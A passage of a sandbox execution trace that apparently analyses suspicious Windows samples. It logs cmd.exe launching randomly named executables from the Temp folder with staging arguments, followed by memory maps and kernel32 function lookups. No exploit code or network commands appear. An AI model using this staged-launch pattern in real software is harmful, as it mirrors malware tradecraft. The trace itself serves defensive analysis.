(_String1="\"C", _String2="START") returned -81 [0112.862] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0112.862] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0112.862] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0112.862] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0112.862] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0112.862] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0112.862] _wcsicmp 
(_String1="\"C", _String2="FTYPE") returned -68 [0112.862] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0112.862] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0112.862] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0112.862] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0112.862] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0112.862] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0112.862] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0112.862] SetErrorMode (uMode=0x0) returned 0x0 [0112.862] SetErrorMode (uMode=0x1) returned 0x0 [0112.862] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3e04b8, lpFilePart=0x28f414 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x28f414*="Temp") returned 0x23 [0112.862] SetErrorMode (uMode=0x0) returned 0x1 [0112.863] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0112.863] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.865] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.866] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", fInfoLevelId=0x1, lpFindFileData=0x28f1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1b0) returned 0x3e2478 [0112.866] FindClose (in: hFindFile=0x3e2478 | out: hFindFile=0x3e2478) returned 1 [0112.866] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0112.866] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0112.866] GetConsoleTitleW (in: lpConsoleTitle=0x28f688, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.866] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f510, dwAttributeCount=0x1, 
dwFlags=0x0, lpSize=0x28f5d8 | out: lpAttributeList=0x28f510, lpSize=0x28f5d8) returned 1 [0112.866] UpdateProcThreadAttribute (in: lpAttributeList=0x28f510, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f5d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f510, lpPreviousValue=0x0) returned 1 [0112.866] GetStartupInfoW (in: lpStartupInfo=0x28f4cc | out: lpStartupInfo=0x28f4cc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp 
(_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0112.867] lstrcmpW (lpString1="\\hvGO9ckx.exe", lpString2="\\XCOPY.EXE") returned -1 [0112.868] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessAttributes=0x0, 
lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f56c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f5b8 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessInformation=0x28f5b8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdcc, dwThreadId=0xdd0)) returned 1 [0113.112] CloseHandle (hObject=0x4c) returned 1 [0113.112] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0113.112] GetEnvironmentStringsW () returned 0x3e2cf0* [0113.112] FreeEnvironmentStringsW (penv=0x3e2cf0) returned 1 [0113.112] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0115.639] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x28f4ac | out: lpExitCode=0x28f4ac*=0x0) returned 1 [0115.639] CloseHandle (hObject=0x50) returned 1 [0115.639] _vsnwprintf (in: _Buffer=0x28f5f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f4b8 | out: _Buffer="00000000") returned 8 [0115.639] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0115.639] GetEnvironmentStringsW () returned 0x3e2498* [0115.639] FreeEnvironmentStringsW (penv=0x3e2498) returned 1 [0115.639] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0115.639] GetEnvironmentStringsW () returned 0x3e2498* [0115.639] FreeEnvironmentStringsW (penv=0x3e2498) returned 1 [0115.639] 
DeleteProcThreadAttributeList (in: lpAttributeList=0x28f510 | out: lpAttributeList=0x28f510) [0115.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.639] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0115.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.639] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0115.640] _get_osfhandle (_FileHandle=0) returned 0x3 [0115.640] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0115.640] SetConsoleInputExeNameW () returned 0x1 [0115.640] GetConsoleOutputCP () returned 0x1b5 [0115.640] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0115.640] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.640] exit (_Code=0) Process: id = "43" image_name = "bkm66byk.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe" page_root = "0x7ea16780" os_pid = "0xd80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0xd5c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7216 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7217 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000030000" filename = "" Region: id = 7218 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7219 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7220 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7221 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7223 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 7224 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7225 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7226 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7227 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 7228 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 7229 start_va = 0x520000 end_va = 0x5e7fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 7230 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7231 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7232 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7233 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7234 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7235 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7236 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7237 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7238 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 
0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7239 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7240 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7241 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7242 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7243 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7244 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7245 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7246 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7261 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = 
"private_0x0000000000020000" filename = "" Region: id = 7262 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7263 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 7264 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 7298 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 7299 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7300 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7301 start_va = 0x1440000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 7302 start_va = 0x1550000 end_va = 0x181efff entry_point = 0x1550000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7303 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 7304 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7417 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name 
= "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 7418 start_va = 0x1820000 end_va = 0x191ffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 7419 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 7420 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7421 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 7422 start_va = 0x1440000 end_va = 0x14dffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 7423 start_va = 0x1510000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 7424 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7425 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 7472 start_va = 0x1920000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 7473 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") 
Region: id = 7474 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 71 os_tid = 0xd84 [0112.606] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0112.606] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0112.606] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0112.606] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0112.607] 
GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0112.608] 
GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0112.609] GetProcAddress (hModule=0x76910000, 
lpProcName="GetDateFormatW") returned 0x7695afab [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 